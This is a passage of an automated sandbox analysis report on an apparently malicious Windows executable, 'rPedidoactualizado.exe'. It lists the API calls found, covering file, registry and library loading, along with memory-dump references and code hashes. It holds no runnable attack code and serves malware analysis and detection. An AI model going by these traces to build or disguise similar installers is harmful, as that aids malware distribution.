                                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 004020EB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Library$FreeHandleLoadModule
                                          • String ID:
                                          • API String ID: 2140536961-0
                                          • Opcode ID: 85942fc89a7394ec5be02890c795d7ce19105dcf228e749ef0ece73fd9a55274
                                          • Instruction ID: 4ef3947a4f3b15eeb1edbcf2825d86a3d57027b1e8ef6f61f5e5c173a0dbc30c
                                          • Opcode Fuzzy Hash: 85942fc89a7394ec5be02890c795d7ce19105dcf228e749ef0ece73fd9a55274
                                          • Instruction Fuzzy Hash: 54114271D00205ABCF20AFA5CA8859E7A71BF04345F64853BF501F61E0DBB98D91DB69
                                          APIs
                                            • Part of subcall function 004065DA: FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 004065E5
                                            • Part of subcall function 004065DA: FindClose.KERNELBASE(00000000), ref: 004065F1
                                          • lstrlenW.KERNEL32 ref: 00402299
                                          • lstrlenW.KERNEL32(00000000), ref: 004022A4
                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: FileFindlstrlen$CloseFirstOperation
                                          • String ID:
                                          • API String ID: 1486964399-0
                                          • Opcode ID: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
                                          • Instruction ID: bbe877ab11025427faf5f2d41b675fbfdb26c0ea37d129f2242468f609b66021
                                          • Opcode Fuzzy Hash: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
                                          • Instruction Fuzzy Hash: 74117071D10314AADF10EFF98A4999EB7B8AF04344F14847FA805F72D1D6B8C4418B59
                                          APIs
                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040253E
                                          • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Enum$CloseValue
                                          • String ID:
                                          • API String ID: 397863658-0
                                          • Opcode ID: 95b9409de080be2480ae3ebee57d62febf19c414c59d57b92fdc5ca9ae51cd4c
                                          • Instruction ID: aff41db5cb1f43c080787ec2daae132adce55f0eb50407644cc943dfdce05a74
                                          • Opcode Fuzzy Hash: 95b9409de080be2480ae3ebee57d62febf19c414c59d57b92fdc5ca9ae51cd4c
                                          • Instruction Fuzzy Hash: 59018471904204BFEB149F95DE88ABF7ABCEF80348F14803EF505B61D0DAB85E419B69
                                          APIs
                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                          • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue
                                          • String ID:
                                          • API String ID: 3356406503-0
                                          • Opcode ID: ef205e07a954bd81c45d0a02b1537dcbd35f0958168012aad3e58056c5502209
                                          • Instruction ID: 1ba22ac92ecf447665b3913d31df39b0814a7bcf15a964c104b9173a467dca89
                                          • Opcode Fuzzy Hash: ef205e07a954bd81c45d0a02b1537dcbd35f0958168012aad3e58056c5502209
                                          • Instruction Fuzzy Hash: 2A119431910205EBDB14DFA4CA585AE77B4FF44348F20843FE445B72C0D6B85A41EB5A
                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                          • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                          • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                          • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                          APIs
                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004023B0
                                          • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CloseDeleteValue
                                          • String ID:
                                          • API String ID: 2831762973-0
                                          • Opcode ID: abe2d5b86983b76f37ebbeb52e479933b9f051492a06271b13e7fa2919bd31b5
                                          • Instruction ID: ea1e1dc52e0dd693c7e9773bcfdc4231a80a88f887ae940f22e44fa758f22ebe
                                          • Opcode Fuzzy Hash: abe2d5b86983b76f37ebbeb52e479933b9f051492a06271b13e7fa2919bd31b5
                                          • Instruction Fuzzy Hash: 4CF06232A045119BE704ABA49B8EABE72A4AB44354F29403FFA42F71C1CAF85D41576D
                                          APIs
                                          • OleInitialize.OLE32(00000000), ref: 004053E2
                                            • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                          • CoUninitialize.COMBASE(00000404,00000000), ref: 0040542E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: InitializeMessageSendUninitialize
                                          • String ID:
                                          • API String ID: 2896919175-0
                                          • Opcode ID: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
                                          • Instruction ID: 958387d264b6e353c5d11acff8941ae2ccbfc231999d5e23939142942d374e26
                                          • Opcode Fuzzy Hash: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
                                          • Instruction Fuzzy Hash: A8F024735009108BD3402B40ED02B6773A4EBC5301F05C03FEE84B22E1CB780C408B1E
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
                                          • Instruction ID: ff893fd080683d27dd3b5e94bf1da30195128cfff23c54bbc30ea882265df843
                                          • Opcode Fuzzy Hash: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
                                          • Instruction Fuzzy Hash: DBE04876B141049BCB14CBA8DD8086E77A5A789310724457BD501B3650CA79AD50CF68
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                            • Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                            • Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
                                            • Part of subcall function 00406601: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                          • String ID:
                                          • API String ID: 2547128583-0
                                          • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                          • Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
                                          • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                          • Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\rPedidoactualizado.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                          • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                          • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                          • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,?,0040596D,?,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
